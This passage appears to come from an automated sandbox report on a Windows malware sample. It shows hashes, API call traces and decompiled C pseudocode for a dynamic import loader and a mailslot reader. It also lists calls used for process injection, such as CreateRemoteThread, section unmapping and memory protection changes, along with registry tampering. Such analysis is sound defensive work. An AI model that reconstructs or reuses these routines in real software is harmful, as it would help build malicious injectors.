  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
